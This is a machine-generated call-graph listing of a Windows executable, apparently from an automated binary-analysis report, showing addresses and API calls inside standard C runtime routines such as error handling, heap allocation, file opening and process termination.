API calls 20925->20929 20930 40e4c8 20926->20930 20927->20941 20945 40ee90 20927->20945 20931 40e50b 20928->20931 20929->20916 20932 414bd2 _Ungetc 41 API calls 20930->20932 20933 40e535 20931->20933 20934 40ee90 41 API calls 20931->20934 20932->20919 20952 416351 20933->20952 20936 40e51c 20934->20936 20936->20933 20938 40e522 20936->20938 20939 40f649 43 API calls 20938->20939 20939->20941 20940 40e072 __dosmaperr 14 API calls 20940->20941 20941->20904 20977 40bb79 LeaveCriticalSection 20942->20977 20944 40e5fd 20944->20905 20946 40ee54 20945->20946 20947 40e072 __dosmaperr 14 API calls 20946->20947 20950 40ee75 20946->20950 20948 40ee65 20947->20948 20949 40df74 _Ungetc 41 API calls 20948->20949 20951 40ee70 20949->20951 20950->20927 20951->20927 20953 416364 _Fputc 20952->20953 20958 41621e 20953->20958 20956 40bbd5 _Fputc 41 API calls 20957 40e549 20956->20957 20957->20940 20957->20941 20959 416232 20958->20959 20968 416242 20958->20968 20960 416267 20959->20960 20961 40d730 _Fputc 41 API calls 20959->20961 20959->20968 20962 416278 20960->20962 20963 41629b 20960->20963 20961->20960 20970 421a85 20962->20970 20965 4162c3 20963->20965 20966 416317 20963->20966 20963->20968 20965->20968 20969 41b00f __wsopen_s MultiByteToWideChar 20965->20969 20967 41b00f __wsopen_s MultiByteToWideChar 20966->20967 20967->20968 20968->20956 20969->20968 20973 423fd4 20970->20973 20976 423fff _Fputc 20973->20976 20974 407420 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20975 421aa0 20974->20975 20975->20968 20976->20974 20977->20944 20978->20860 20980 40ee60 20979->20980 20982 40ee75 20979->20982 20981 40e072 __dosmaperr 14 API calls 20980->20981 20983 40ee65 20981->20983 20982->20865 20984 40df74 _Ungetc 41 API calls 20983->20984 20985 40ee70 20984->20985 20985->20865 20989 40bb79 LeaveCriticalSection 20986->20989 20988 40efa5 20988->20867 20989->20988 20990->20888 20992 40f568 20991->20992 20995 40f5d8 20991->20995 20993 414bd2 _Ungetc 41 API calls 20992->20993 21000 40f56e 20993->21000 20994 40f5d0 21002 40f6b4 20994->21002 20995->20994 21005 418105 20995->21005 20997 40f5c0 20998 40e072 __dosmaperr 14 API calls 20997->20998 20999 40f5c5 20998->20999 21001 40df74 _Ungetc 41 API calls 20999->21001 21000->20995 21000->20997 21001->20994 21010 40bb79 LeaveCriticalSection 21002->21010 21004 40f6ba 21004->20891 21006 414094 __dosmaperr 14 API calls 21005->21006 21007 418122 21006->21007 21008 4140f1 ___free_lconv_mon 14 API calls 21007->21008 21009 41812c 21008->21009 21009->20994 21010->21004 21082 4060d1 21083 406124 21082->21083 21084 4060d8 21082->21084 21087 40bb65 EnterCriticalSection 21084->21087 21086 4060dd 21087->21086 21306 411aed 21309 4117b9 21306->21309 21310 4117c5 ___scrt_is_nonwritable_in_current_image 21309->21310 21317 40e0c6 EnterCriticalSection 21310->21317 21312 4117fd 21318 41181b 21312->21318 21314 4117cf 21314->21312 21316 41dcc6 __Getctype 14 API calls 21314->21316 21316->21314 21317->21314 21321 40e10e LeaveCriticalSection 21318->21321 21320 411809 21321->21320 17346 413ef2 17351 413cc8 17346->17351 17348 413f31 17352 413ce7 17351->17352 17353 413cfa 17352->17353 17361 413d0f 17352->17361 17371 40e072 17353->17371 17357 413d0a 17357->17348 17368 41fe8c 17357->17368 17358 40e072 __dosmaperr 14 API calls 17359 413ee0 17358->17359 17360 40df74 _Ungetc 41 API calls 17359->17360 17360->17357 17361->17361 17366 413e2f 17361->17366 17377 41f71e 17361->17377 17363 413e7f 17364 41f71e 41 API calls 17363->17364 17363->17366 17365 413e9d 17364->17365 17365->17366 17367 41f71e 41 API calls 17365->17367 17366->17357 17366->17358 17367->17366 17903 41f856 17368->17903 17391 41528c GetLastError 17371->17391 17373 40e077 17374 40df74 17373->17374 17612 40dec0 17374->17612 17378 41f775 17377->17378 17379 41f72d 17377->17379 17826 41f78b 17378->17826 17381 41f733 17379->17381 17382 41f750 17379->17382 17384 40e072 __dosmaperr 14 API calls 17381->17384 17386 40e072 __dosmaperr 14 API calls 17382->17386 17390 41f76e 17382->17390 17383 41f743 17383->17363 17385 41f738 17384->17385 17387 40df74 _Ungetc 41 API calls 17385->17387 17388 41f75f 17386->17388 17387->17383 17389 40df74 _Ungetc 41 API calls 17388->17389 17389->17383 17390->17363 17392 4152a2 17391->17392 17393 4152a8 17391->17393 17414 4145dd 17392->17414 17411 4152ac SetLastError 17393->17411 17419 41461c 17393->17419 17399 4152d9 17400 4152e1 17399->17400 17401 4152f2 17399->17401 17402 41461c __dosmaperr 6 API calls 17400->17402 17403 41461c __dosmaperr 6 API calls 17401->17403 17404 4152ef 17402->17404 17405 4152fe 17403->17405 17431 4140f1 17404->17431 17406 415302 17405->17406 17407 415319 17405->17407 17408 41461c __dosmaperr 6 API calls 17406->17408 17437 414f69 17407->17437 17408->17404 17411->17373 17413 4140f1 ___free_lconv_mon 12 API calls 17413->17411 17442 4143cc 17414->17442 17416 4145f9 17417 414602 17416->17417 17418 414614 TlsGetValue 17416->17418 17417->17393 17420 4143cc __dosmaperr 5 API calls 17419->17420 17421 414638 17420->17421 17422 414656 TlsSetValue 17421->17422 17423 414641 17421->17423 17423->17411 17424 414094 17423->17424 17429 4140a1 __dosmaperr 17424->17429 17425 4140e1 17428 40e072 __dosmaperr 13 API calls 17425->17428 17426 4140cc HeapAlloc 17427 4140df 17426->17427 17426->17429 17427->17399 17428->17427 17429->17425 17429->17426 17456 412e98 17429->17456 17432 414126 17431->17432 17433 4140fc HeapFree 17431->17433 17432->17411 17433->17432 17434 414111 GetLastError 17433->17434 17435 41411e __dosmaperr 17434->17435 17436 40e072 __dosmaperr 12 API calls 17435->17436 17436->17432 17470 414dfd 17437->17470 17443 4143fa 17442->17443 17447 4143f6 __dosmaperr 17442->17447 17443->17447 17448 414301 17443->17448 17446 414414 GetProcAddress 17446->17447 17447->17416 17454 414312 ___vcrt_InitializeCriticalSectionEx 17448->17454 17449 4143a8 17449->17446 17449->17447 17450 414330 LoadLibraryExW 17451 41434b GetLastError 17450->17451 17452 4143af 17450->17452 17451->17454 17452->17449 17453 4143c1 FreeLibrary 17452->17453 17453->17449 17454->17449 17454->17450 17455 41437e LoadLibraryExW 17454->17455 17455->17452 17455->17454 17459 412ec5 17456->17459 17460 412ed1 ___scrt_is_nonwritable_in_current_image 17459->17460 17465 40e0c6 EnterCriticalSection 17460->17465 17462 412edc 17466 412f18 17462->17466 17465->17462 17469 40e10e LeaveCriticalSection 17466->17469 17468 412ea3 17468->17429 17469->17468 17471 414e09 ___scrt_is_nonwritable_in_current_image 17470->17471 17484 40e0c6 EnterCriticalSection 17471->17484 17473 414e13 17485 414e43 17473->17485 17476 414f0f 17477 414f1b ___scrt_is_nonwritable_in_current_image 17476->17477 17489 40e0c6 EnterCriticalSection 17477->17489 17479 414f25 17490 4150f0 17479->17490 17481 414f3d 17494 414f5d 17481->17494 17484->17473 17488 40e10e LeaveCriticalSection 17485->17488 17487 414e31 17487->17476 17488->17487 17489->17479 17491 415126 __Getctype 17490->17491 17492 4150ff __Getctype 17490->17492 17491->17481 17492->17491 17497 41d9f9 17492->17497 17611 40e10e LeaveCriticalSection 17494->17611 17496 414f4b 17496->17413 17498 41da79 17497->17498 17500 41da0f 17497->17500 17501 4140f1 ___free_lconv_mon 14 API calls 17498->17501 17523 41dac7 17498->17523 17500->17498 17505 41da42 17500->17505 17507 4140f1 ___free_lconv_mon 14 API calls 17500->17507 17502 41da9b 17501->17502 17503 4140f1 ___free_lconv_mon 14 API calls 17502->17503 17504 41daae 17503->17504 17509 4140f1 ___free_lconv_mon 14 API calls 17504->17509 17510 4140f1 ___free_lconv_mon 14 API calls 17505->17510 17524 41da64 17505->17524 17506 4140f1 ___free_lconv_mon 14 API calls 17511 41da6e 17506->17511 17513 41da37 17507->17513 17508 41dad5 17512 41db35 17508->17512 17522 4140f1 14 API calls ___free_lconv_mon 17508->17522 17514 41dabc 17509->17514 17515 41da59 17510->17515 17516 4140f1 ___free_lconv_mon 14 API calls 17511->17516 17517 4140f1 ___free_lconv_mon 14 API calls 17512->17517 17525 41ccaf 17513->17525 17519 4140f1 ___free_lconv_mon 14 API calls 17514->17519 17553 41d163 17515->17553 17516->17498 17521 41db3b 17517->17521 17519->17523 17521->17491 17522->17508 17565 41db6a 17523->17565 17524->17506 17526 41ccc0 17525->17526 17552 41cda9 17525->17552 17527 41ccd1 17526->17527 17529 4140f1 ___free_lconv_mon 14 API calls 17526->17529 17528 41cce3 17527->17528 17530 4140f1 ___free_lconv_mon 14 API calls 17527->17530 17531 41ccf5 17528->17531 17532 4140f1 ___free_lconv_mon 14 API calls 17528->17532 17529->17527 17530->17528 17533 41cd07 17531->17533 17534 4140f1 ___free_lconv_mon 14 API calls 17531->17534 17532->17531 17535 41cd19 17533->17535 17537 4140f1 ___free_lconv_mon 14 API calls 17533->17537 17534->17533 17536 41cd2b 17535->17536 17538 4140f1 ___free_lconv_mon 14 API calls 17535->17538 17539 4140f1 ___free_lconv_mon 14 API calls 17536->17539 17540 41cd3d 17536->17540 17537->17535 17538->17536 17539->17540 17541 4140f1 ___free_lconv_mon 14 API calls 17540->17541 17543 41cd4f 17540->17543 17541->17543 17542 41cd61 17544 41cd73 17542->17544 17546 4140f1 ___free_lconv_mon 14 API calls 17542->17546 17543->17542 17545 4140f1 ___free_lconv_mon 14 API calls 17543->17545 17547 41cd85 17544->17547 17548 4140f1 ___free_lconv_mon 14 API calls 17544->17548 17545->17542 17546->17544 17549 41cd97 17547->17549 17550 4140f1 ___free_lconv_mon 14 API calls 17547->17550 17548->17547 17551 4140f1 ___free_lconv_mon 14 API calls 17549->17551 17549->17552 17550->17549 17551->17552 17552->17505 17554 41d170 17553->17554 17555 41d1c8 17553->17555 17556 41d180 17554->17556 17557 4140f1 ___free_lconv_mon 14 API calls 17554->17557 17555->17524 17558 41d192 17556->17558 17559 4140f1 ___free_lconv_mon 14 API calls 17556->17559 17557->17556 17560 41d1a4 17558->17560 17562 4140f1 ___free_lconv_mon 14 API calls 17558->17562 17559->17558 17561 41d1b6 17560->17561 17563 4140f1 ___free_lconv_mon 14 API calls 17560->17563 17561->17555 17564 4140f1 ___free_lconv_mon 14 API calls 17561->17564 17562->17560 17563->17561 17564->17555 17566 41db77 17565->17566 17567 41db96 17565->17567 17566->17567 17571 41d67e 17566->17571 17567->17508 17570 4140f1 ___free_lconv_mon 14 API calls 17570->17567 17572 41d75c 17571->17572 17573 41d68f 17571->17573 17572->17570 17607 41d3dd 17573->17607 17576 41d3dd __Getctype 14 API calls 17577 41d6a2 17576->17577 17578 41d3dd __Getctype 14 API calls 17577->17578 17579 41d6ad 17578->17579 17580 41d3dd __Getctype 14 API calls 17579->17580 17581 41d6b8 17580->17581 17582 41d3dd __Getctype 14 API calls 17581->17582 17583 41d6c6 17582->17583 17584 4140f1 ___free_lconv_mon 14 API calls 17583->17584 17585 41d6d1 17584->17585 17586 4140f1 ___free_lconv_mon 14 API calls 17585->17586 17587 41d6dc 17586->17587 17588 4140f1 ___free_lconv_mon 14 API calls 17587->17588 17608 41d3ef 17607->17608 17609 41d3fe 17608->17609 17610 4140f1 ___free_lconv_mon 14 API calls 17608->17610 17609->17576 17610->17608 17611->17496 17613 40ded2 _Fputc 17612->17613 17618 40def7 17613->17618 17615 40deea 17629 40bbd5 17615->17629 17619 40df07 17618->17619 17623 40df0e 17618->17623 17635 40bd36 GetLastError 17619->17635 17621 40df1c 17621->17615 17623->17621 17639 40dd4f 17623->17639 17624 40df43 17624->17621 17642 40dfa1 IsProcessorFeaturePresent 17624->17642 17626 40df73 17627 40dec0 _Ungetc 41 API calls 17626->17627 17628 40df80 17627->17628 17628->17615 17630 40bbe1 17629->17630 17631 40bbf8 17630->17631 17682 40bd7c 17630->17682 17633 40bc0b 17631->17633 17634 40bd7c _Fputc 41 API calls 17631->17634 17633->17357 17634->17633 17636 40bd4f 17635->17636 17646 41533d 17636->17646 17640 40dd73 17639->17640 17641 40dd5a GetLastError SetLastError 17639->17641 17640->17624 17641->17624 17643 40dfad 17642->17643 17668 40dd78 17643->17668 17647 415350 17646->17647 17648 415356 17646->17648 17649 4145dd __dosmaperr 6 API calls 17647->17649 17650 41461c __dosmaperr 6 API calls 17648->17650 17667 40bd67 SetLastError 17648->17667 17649->17648 17651 415370 17650->17651 17652 414094 __dosmaperr 14 API calls 17651->17652 17651->17667 17653 415380 17652->17653 17654 415388 17653->17654 17655 41539d 17653->17655 17657 41461c __dosmaperr 6 API calls 17654->17657 17656 41461c __dosmaperr 6 API calls 17655->17656 17658 4153a9 17656->17658 17664 415394 17657->17664 17659 4153ad 17658->17659 17660 4153bc 17658->17660 17662 41461c __dosmaperr 6 API calls 17659->17662 17663 414f69 __dosmaperr 14 API calls 17660->17663 17661 4140f1 ___free_lconv_mon 14 API calls 17661->17667 17662->17664 17665 4153c7 17663->17665 17664->17661 17666 4140f1 ___free_lconv_mon 14 API calls 17665->17666 17666->17667 17667->17623 17669 40dd94 _unexpected codecvt 17668->17669 17670 40ddc0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17669->17670 17673 40de91 _unexpected 17670->17673 17672 40deaf GetCurrentProcess TerminateProcess 17672->17626 17674 407420 17673->17674 17675 407428 17674->17675 17676 407429 IsProcessorFeaturePresent 17674->17676 17675->17672 17678 407db2 17676->17678 17681 407d75 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17678->17681 17680 407e95 17680->17672 17681->17680 17683 40bd86 17682->17683 17684 40bd8f 17682->17684 17685 40bd36 _Fputc 16 API calls 17683->17685 17684->17631 17686 40bd8b 17685->17686 17686->17684 17689 40e13c 17686->17689 17700 4174ae 17689->17700 17692 40e14c 17694 40e156 IsProcessorFeaturePresent 17692->17694 17695 40e175 17692->17695 17697 40e162 17694->17697 17730 411577 17695->17730 17699 40dd78 _unexpected 8 API calls 17697->17699 17699->17695 17733 4173e0 17700->17733 17703 4174f3 17704 4174ff ___scrt_is_nonwritable_in_current_image 17703->17704 17705 41528c __dosmaperr 14 API calls 17704->17705 17710 41752c _unexpected 17704->17710 17711 417526 _unexpected 17704->17711 17705->17711 17706 417573 17708 40e072 __dosmaperr 14 API calls 17706->17708 17707 41755d 17707->17692 17709 417578 17708->17709 17712 40df74 _Ungetc 41 API calls 17709->17712 17713 41759f 17710->17713 17744 40e0c6 EnterCriticalSection 17710->17744 17711->17706 17711->17707 17711->17710 17712->17707 17716 4175e1 17713->17716 17717 4176d2 17713->17717 17728 417610 17713->17728 17716->17728 17745 41513b GetLastError 17716->17745 17719 4176dd 17717->17719 17776 40e10e LeaveCriticalSection 17717->17776 17721 411577 _unexpected 23 API calls 17719->17721 17722 4176e5 17721->17722 17724 41513b __Getctype 41 API calls 17726 417665 17724->17726 17726->17707 17729 41513b __Getctype 41 API calls 17726->17729 17727 41513b __Getctype 41 API calls 17727->17728 17772 41767f 17728->17772 17729->17707 17778 41139b 17730->17778 17734 4173ec ___scrt_is_nonwritable_in_current_image 17733->17734 17739 40e0c6 EnterCriticalSection 17734->17739 17736 4173fa 17740 417438 17736->17740 17739->17736 17743 40e10e LeaveCriticalSection 17740->17743 17742 40e141 17742->17692 17742->17703 17743->17742 17744->17713 17746 415151 17745->17746 17747 415157 17745->17747 17749 4145dd __dosmaperr 6 API calls 17746->17749 17748 41461c __dosmaperr 6 API calls 17747->17748 17751 41515b SetLastError 17747->17751 17750 415173 17748->17750 17749->17747 17750->17751 17753 414094 __dosmaperr 14 API calls 17750->17753 17755 4151f0 17751->17755 17756 4151eb 17751->17756 17754 415188 17753->17754 17757 4151a1 17754->17757 17758 415190 17754->17758 17759 40e13c CallUnexpected 39 API calls 17755->17759 17756->17727 17761 41461c __dosmaperr 6 API calls 17757->17761 17760 41461c __dosmaperr 6 API calls 17758->17760 17762 4151f5 17759->17762 17763 41519e 17760->17763 17764 4151ad 17761->17764 17767 4140f1 ___free_lconv_mon 14 API calls 17763->17767 17765 4151b1 17764->17765 17766 4151c8 17764->17766 17769 41461c __dosmaperr 6 API calls 17765->17769 17768 414f69 __dosmaperr 14 API calls 17766->17768 17767->17751 17770 4151d3 17768->17770 17769->17763 17771 4140f1 ___free_lconv_mon 14 API calls 17770->17771 17771->17751 17773 417685 17772->17773 17774 417656 17772->17774 17777 40e10e LeaveCriticalSection 17773->17777 17774->17707 17774->17724 17774->17726 17776->17719 17777->17774 17779 4113c8 17778->17779 17780 4113da 17778->17780 17805 411463 GetModuleHandleW 17779->17805 17790 411263 17780->17790 17785 40e17f 17791 41126f ___scrt_is_nonwritable_in_current_image 17790->17791 17813 40e0c6 EnterCriticalSection 17791->17813 17793 411279 17814 4112b0 17793->17814 17795 411286 17818 4112a4 17795->17818 17798 411432 17821 4114a6 17798->17821 17801 411450 17803 4114c8 _unexpected 3 API calls 17801->17803 17802 411440 GetCurrentProcess TerminateProcess 17802->17801 17804 411458 ExitProcess 17803->17804 17806 4113cd 17805->17806 17806->17780 17807 4114c8 GetModuleHandleExW 17806->17807 17808 411507 GetProcAddress 17807->17808 17809 411528 17807->17809 17808->17809 17810 41151b 17808->17810 17811 4113d9 17809->17811 17812 41152e FreeLibrary 17809->17812 17810->17809 17811->17780 17812->17811 17813->17793 17816 4112bc ___scrt_is_nonwritable_in_current_image 17814->17816 17815 411323 _unexpected 17815->17795 17816->17815 17817 4131c9 _unexpected 14 API calls 17816->17817 17817->17815 17819 40e10e std::_Lockit::~_Lockit LeaveCriticalSection 17818->17819 17820 411292 17819->17820 17820->17785 17820->17798 17822 41914c _unexpected 6 API calls 17821->17822 17823 4114ab 17822->17823 17824 4114b0 GetPEB 17823->17824 17825 41143c 17823->17825 17824->17825 17825->17801 17825->17802 17827 41f7b5 17826->17827 17828 41f79b 17826->17828 17829 41f7d4 17827->17829 17830 41f7bd 17827->17830 17831 40e072 __dosmaperr 14 API calls 17828->17831 17833 41f7e0 17829->17833 17834 41f7f7 17829->17834 17832 40e072 __dosmaperr 14 API calls 17830->17832 17835 41f7a0 17831->17835 17837 41f7c2 17832->17837 17838 40e072 __dosmaperr 14 API calls 17833->17838 17843 41f7ab 17834->17843 17844 40fc60 17834->17844 17836 40df74 _Ungetc 41 API calls 17835->17836 17836->17843 17840 40df74 _Ungetc 41 API calls 17837->17840 17841 41f7e5 17838->17841 17840->17843 17842 40df74 _Ungetc 41 API calls 17841->17842 17842->17843 17843->17383 17845 40fc7e 17844->17845 17851 40fc77 17844->17851 17846 41513b __Getctype 41 API calls 17845->17846 17845->17851 17847 40fc9f 17846->17847 17852 415474 17847->17852 17851->17843 17853 415487 17852->17853 17854 40fcb5 17852->17854 17853->17854 17860 41dc45 17853->17860 17856 4154d2 17854->17856 17857 4154e5 17856->17857 17858 4154fa 17856->17858 17857->17858 17882 41c183 17857->17882 17858->17851 17861 41dc51 ___scrt_is_nonwritable_in_current_image 17860->17861 17862 41513b __Getctype 41 API calls 17861->17862 17863 41dc5a 17862->17863 17864 41dca0 17863->17864 17873 40e0c6 EnterCriticalSection 17863->17873 17864->17854 17866 41dc78 17874 41dcc6 17866->17874 17871 40e13c CallUnexpected 41 API calls 17872 41dcc5 17871->17872 17873->17866 17875 41dc89 17874->17875 17876 41dcd4 __Getctype 17874->17876 17878 41dca5 17875->17878 17876->17875 17877 41d9f9 __Getctype 14 API calls 17876->17877 17877->17875 17881 40e10e LeaveCriticalSection 17878->17881 17880 41dc9c 17880->17864 17880->17871 17881->17880 17883 41513b __Getctype 41 API calls 17882->17883 17884 41c188 17883->17884 17887 41c09b 17884->17887 17888 41c0a7 ___scrt_is_nonwritable_in_current_image 17887->17888 17889 41c0c1 17888->17889 17898 40e0c6 EnterCriticalSection 17888->17898 17891 41c0c8 17889->17891 17894 40e13c CallUnexpected 41 API calls 17889->17894 17891->17858 17892 41c0fd 17899 41c11a 17892->17899 17896 41c13a 17894->17896 17895 41c0d1 17895->17892 17897 4140f1 ___free_lconv_mon 14 API calls 17895->17897 17897->17892 17898->17895 17902 40e10e LeaveCriticalSection 17899->17902 17901 41c121 17901->17889 17902->17901 17906 41f862 ___scrt_is_nonwritable_in_current_image 17903->17906 17904 41f869 17905 40e072 __dosmaperr 14 API calls 17904->17905 17907 41f86e 17905->17907 17906->17904 17908 41f894 17906->17908 17910 40df74 _Ungetc 41 API calls 17907->17910 17914 41fe1e 17908->17914 17913 41f878 17910->17913 17913->17348 17927 41b2f4 17914->17927 17920 41fe54 17921 41f8b8 17920->17921 17922 4140f1 ___free_lconv_mon 14 API calls 17920->17922 17923 41f8eb 17921->17923 17922->17921 17924 41f8f1 17923->17924 17926 41f915 17923->17926 18444 41ca68 LeaveCriticalSection 17924->18444 17926->17913 17928 40fc60 __wsopen_s 41 API calls 17927->17928 17929 41b306 17928->17929 17931 41b318 17929->17931 17982 41448f 17929->17982 17932 410964 17931->17932 17988 4107f0 17932->17988 17935 41feaf 18036 41fbfa 17935->18036 17938 41fee1 17940 40e05f __dosmaperr 14 API calls 17938->17940 17939 41fefa 18054 41ca8b 17939->18054 17955 41fee6 17940->17955 17943 41ff08 17947 40e05f __dosmaperr 14 API calls 17943->17947 17944 41ff1f 18067 41fb65 CreateFileW 17944->18067 17946 40e072 __dosmaperr 14 API calls 17948 41fef3 17946->17948 17949 41ff0d 17947->17949 17948->17920 17951 40e072 __dosmaperr 14 API calls 17949->17951 17950 41ffd5 GetFileType 17953 41ffe0 GetLastError 17950->17953 17954 420027 17950->17954 17951->17955 17952 41ffaa GetLastError 17957 40e018 __dosmaperr 14 API calls 17952->17957 17958 40e018 __dosmaperr 14 API calls 17953->17958 18069 41c9d6 17954->18069 17955->17946 17956 41ff58 17956->17950 17956->17952 18068 41fb65 CreateFileW 17956->18068 17957->17955 17960 41ffee CloseHandle 17958->17960 17960->17955 17963 420017 17960->17963 17962 41ff9d 17962->17950 17962->17952 17965 40e072 __dosmaperr 14 API calls 17963->17965 17966 42001c 17965->17966 17966->17955 17967 420094 17972 42009b 17967->17972 18099 41f917 17967->18099 17971 4200d7 17971->17948 17974 420153 CloseHandle 17971->17974 18093 414d2d 17972->18093 18126 41fb65 CreateFileW 17974->18126 17976 42017e 17977 4201b4 17976->17977 17978 420188 GetLastError 17976->17978 17977->17948 17979 40e018 __dosmaperr 14 API calls 17978->17979 17980 420194 17979->17980 17985 4141e3 17982->17985 17986 4143cc __dosmaperr 5 API calls 17985->17986 17987 4141f9 17986->17987 17987->17931 17989 410818 17988->17989 17990 4107fe 17988->17990 17992 41081f 17989->17992 17993 41083e 17989->17993 18006 4109a5 17990->18006 18005 410808 17992->18005 18010 4109e6 17992->18010 18015 41b00f 17993->18015 17996 41084d 17997 410854 GetLastError 17996->17997 18001 4109e6 __wsopen_s 15 API calls 17996->18001 18004 41087a 17996->18004 18018 40e018 17997->18018 17999 41b00f __wsopen_s MultiByteToWideChar 18002 410891 17999->18002 18001->18004 18002->17997 18002->18005 18003 40e072 __dosmaperr 14 API calls 18003->18005 18004->17999 18004->18005 18005->17920 18005->17935 18007 4109b0 18006->18007 18008 4109b8 18006->18008 18009 4140f1 ___free_lconv_mon 14 API calls 18007->18009 18008->18005 18009->18008 18011 4109a5 __wsopen_s 14 API calls 18010->18011 18012 4109f4 18011->18012 18023 410a25 18012->18023 18016 41b020 MultiByteToWideChar 18015->18016 18016->17996 18033 40e05f 18018->18033 18020 40e023 __dosmaperr 18021 40e072 __dosmaperr 14 API calls 18020->18021 18022 40e036 18021->18022 18022->18003 18026 415426 18023->18026 18027 415464 18026->18027 18032 415434 __dosmaperr 18026->18032 18028 40e072 __dosmaperr 14 API calls 18027->18028 18030 410a05 18028->18030 18029 41544f HeapAlloc 18029->18030 18029->18032 18030->18005 18031 412e98 std::ios_base::_Init 2 API calls 18031->18032 18032->18027 18032->18029 18032->18031 18034 41528c __dosmaperr 14 API calls 18033->18034 18035 40e064 18034->18035 18035->18020 18037 41fc35 18036->18037 18038 41fc1b 18036->18038 18136 41fb8a 18037->18136 18038->18037 18040 40e072 __dosmaperr 14 API calls 18038->18040 18041 41fc2a 18040->18041 18042 40df74 _Ungetc 41 API calls 18041->18042 18042->18037 18043 41fc6d 18044 41fc9c 18043->18044 18046 40e072 __dosmaperr 14 API calls 18043->18046 18049 41fcef 18044->18049 18143 4115c9 18044->18143 18048 41fc91 18046->18048 18047 41fcea 18047->18049 18050 41fd67 18047->18050 18051 40df74 _Ungetc 41 API calls 18048->18051 18049->17938 18049->17939 18052 40dfa1 __Getctype 11 API calls 18050->18052 18051->18044 18053 41fd73 18052->18053 18055 41ca97 ___scrt_is_nonwritable_in_current_image 18054->18055 18150 40e0c6 EnterCriticalSection 18055->18150 18057 41ca9e 18058 41cac3 18057->18058 18063 41cb32 EnterCriticalSection 18057->18063 18064 41cae5 18057->18064 18154 41c865 18058->18154 18063->18064 18065 41cb3f LeaveCriticalSection 18063->18065 18151 41cb95 18064->18151 18065->18057 18067->17956 18068->17962 18070 41c9e5 18069->18070 18071 41ca4e 18069->18071 18070->18071 18077 41ca0b __wsopen_s 18070->18077 18072 40e072 __dosmaperr 14 API calls 18071->18072 18073 41ca53 18072->18073 18074 40e05f __dosmaperr 14 API calls 18073->18074 18075 41ca3b 18074->18075 18075->17967 18078 41fd74 18075->18078 18076 41ca35 SetStdHandle 18076->18075 18077->18075 18077->18076 18079 41fdce 18078->18079 18080 41fd9c 18078->18080 18079->17967 18080->18079 18168 418ab3 18080->18168 18094 414d40 _Fputc 18093->18094 18409 414d5d 18094->18409 18100 41fa2b 18099->18100 18101 41f948 18099->18101 18100->17971 18100->17972 18102 4115c9 __wsopen_s 41 API calls 18101->18102 18109 41f968 18101->18109 18103 41f95f 18102->18103 18104 41fb5a 18103->18104 18103->18109 18105 40dfa1 __Getctype 11 API calls 18104->18105 18106 41fb64 18105->18106 18107 41fa51 18107->18100 18108 422232 __wsopen_s 53 API calls 18107->18108 18111 41fa5b 18107->18111 18114 41fa83 18108->18114 18109->18100 18109->18107 18110 418ab3 __wsopen_s 43 API calls 18109->18110 18113 41fa22 18109->18113 18112 41fa3b 18110->18112 18111->18100 18120 40e072 __dosmaperr 14 API calls 18111->18120 18112->18113 18118 41fa46 18112->18118 18113->18100 18113->18111 18422 416c70 18113->18422 18114->18100 18114->18111 18115 41faee 18114->18115 18116 41fac8 18114->18116 18117 41fabb 18114->18117 18121 418ab3 __wsopen_s 43 API calls 18115->18121 18116->18115 18124 41fad0 18116->18124 18122 40e072 __dosmaperr 14 API calls 18117->18122 18123 418ab3 __wsopen_s 43 API calls 18118->18123 18120->18100 18121->18111 18122->18111 18123->18107 18125 418ab3 __wsopen_s 43 API calls 18124->18125 18125->18111 18126->17976 18139 41fba2 18136->18139 18137 41fbbd 18137->18043 18138 40e072 __dosmaperr 14 API calls 18140 41fbe1 18138->18140 18139->18137 18139->18138 18141 40df74 _Ungetc 41 API calls 18140->18141 18142 41fbec 18141->18142 18142->18043 18144 4115d5 18143->18144 18145 4115ea 18143->18145 18146 40e072 __dosmaperr 14 API calls 18144->18146 18145->18047 18147 4115da 18146->18147 18148 40df74 _Ungetc 41 API calls 18147->18148 18149 4115e5 18148->18149 18149->18047 18150->18057 18162 40e10e LeaveCriticalSection 18151->18162 18153 41cb05 18153->17943 18153->17944 18155 414094 __dosmaperr 14 API calls 18154->18155 18157 41c877 18155->18157 18156 41c884 18158 4140f1 ___free_lconv_mon 14 API calls 18156->18158 18157->18156 18163 4146d9 18157->18163 18160 41c8d9 18158->18160 18160->18064 18161 41c9b3 EnterCriticalSection 18160->18161 18161->18064 18162->18153 18164 4143cc __dosmaperr 5 API calls 18163->18164 18165 4146f5 18164->18165 18166 414713 InitializeCriticalSectionAndSpinCount 18165->18166 18167 4146fe 18165->18167 18166->18167 18167->18157 18169 418ac7 _Fputc 18168->18169 18243 4189d2 18169->18243 18171 418adc 18249 41cc2f 18243->18249 18245 4189e4 18246 418a00 SetFilePointerEx 18245->18246 18248 4189ec __wsopen_s 18245->18248 18247 418a18 GetLastError 18246->18247 18246->18248 18247->18248 18248->18171 18250 41cc3c 18249->18250 18251 41cc51 18249->18251 18252 40e05f __dosmaperr 14 API calls 18250->18252 18253 40e05f __dosmaperr 14 API calls 18251->18253 18255 41cc76 18251->18255 18254 41cc41 18252->18254 18256 41cc81 18253->18256 18257 40e072 __dosmaperr 14 API calls 18254->18257 18255->18245 18258 40e072 __dosmaperr 14 API calls 18256->18258 18410 41cc2f __wsopen_s 41 API calls 18409->18410 18413 414d6d 18410->18413 18411 414d73 18412 41cb9e __wsopen_s 15 API calls 18411->18412 18421 414dcb __wsopen_s 18412->18421 18413->18411 18414 414da5 18413->18414 18416 41cc2f __wsopen_s 41 API calls 18413->18416 18414->18411 18415 41cc2f __wsopen_s 41 API calls 18414->18415 18417 414db1 CloseHandle 18415->18417 18418 414d9c 18416->18418 18417->18411 18420 41cc2f __wsopen_s 41 API calls 18418->18420 18420->18414 18423 416c83 _Fputc 18422->18423 18428 416ca7 18423->18428 18426 40bbd5 _Fputc 41 API calls 18429 416cb3 ___scrt_is_nonwritable_in_current_image 18428->18429 18430 416d77 18429->18430 18432 416c95 18429->18432 18433 416d08 18429->18433 18432->18426 18439 41c9b3 EnterCriticalSection 18433->18439 18444->17926 22423 4067f8 22424 406836 22423->22424 22425 406801 22423->22425 22425->22424 22428 40edff 22425->22428 22427 406829 22429 40ee11 22428->22429 22433 40ee1a ___scrt_uninitialize_crt 22428->22433 22430 40ec83 ___scrt_uninitialize_crt 70 API calls 22429->22430 22431 40ee17 22430->22431 22431->22427 22432 40ee2b 22432->22427 22433->22432 22436 40ec23 22433->22436 22437 40ec2f ___scrt_is_nonwritable_in_current_image 